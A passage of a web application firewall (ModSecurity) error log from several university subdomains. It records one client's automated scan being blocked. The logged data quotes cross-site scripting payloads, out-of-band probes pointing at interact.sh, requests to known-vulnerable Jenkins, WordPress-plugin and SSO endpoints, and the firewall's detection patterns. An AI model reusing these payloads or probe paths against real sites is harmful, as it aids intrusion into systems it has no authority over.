"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15SsCo-f0AAAm@5xoAAAAH"]
[Tue Aug 29 11:51:22.919241 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAmHd@oAAAAz"]
[Tue Aug 29 11:51:22.923098 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAknEOoAAAAB"]
[Tue Aug 29 11:51:22.923862 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAnGkIEAAAAR"]
[Tue Aug 29 11:51:22.927897 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAfWOEQAAAAL"]
[Tue Aug 29 11:51:22.960943 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAnHQdsAAAAT"]
[Tue Aug 29 11:51:22.964191 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAnIlgMAAAAV"]
[Tue Aug 29 11:51:22.965138 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAnDFyUAAAAM"]
[Tue Aug 29 11:51:22.965463 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAkyyEsAAAAW"]
[Tue Aug 29 11:51:22.970205 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAmQ-w8AAAAb"]
[Tue Aug 29 11:51:22.972372 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAlIBh4AAAAn"]
[Tue Aug 29 11:51:22.996377 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAmHd@sAAAAz"]
[Tue Aug 29 11:51:23.017296 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15S8Co-f0AAAfWOEUAAAAL"]
[Tue Aug 29 11:51:23.087316 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15S8Co-f0AAAm91nMAAAAG"]
[Tue Aug 29 11:51:23.091551 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15S8Co-f0AAAhhc1UAAAAd"]
[Tue Aug 29 11:51:23.165148 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAjdQUMAAAAZ"]
[Tue Aug 29 11:51:23.563470 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAnIlgQAAAAV"]
[Tue Aug 29 11:51:23.564164 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAlIBh8AAAAn"]
[Tue Aug 29 11:51:23.565367 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAmIbP8AAAAo"]
[Tue Aug 29 11:51:23.567043 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAkwQXEAAAAS"]
[Tue Aug 29 11:51:23.735723 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAnHQdwAAAAT"]
[Tue Aug 29 11:51:23.754637 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAnTlKEAAAAA"]
[Tue Aug 29 11:51:23.759604 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAm-MdEAAAAI"]
[Tue Aug 29 11:51:23.764457 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAkr0FcAAAAC"]
[Tue Aug 29 11:51:23.771301 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAnIlgUAAAAV"]
[Tue Aug 29 11:51:23.803613 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22><img s found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAnB5VMAAAAJ"]
[Tue Aug 29 11:51:24.760857 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAnIlgcAAAAV"]
[Tue Aug 29 11:51:24.905565 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAfWOEkAAAAL"]
[Tue Aug 29 11:51:24.906747 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAnHQd8AAAAT"]
[Tue Aug 29 11:51:24.912749 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAmIbQMAAAAo"]
[Tue Aug 29 11:51:24.914414 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag 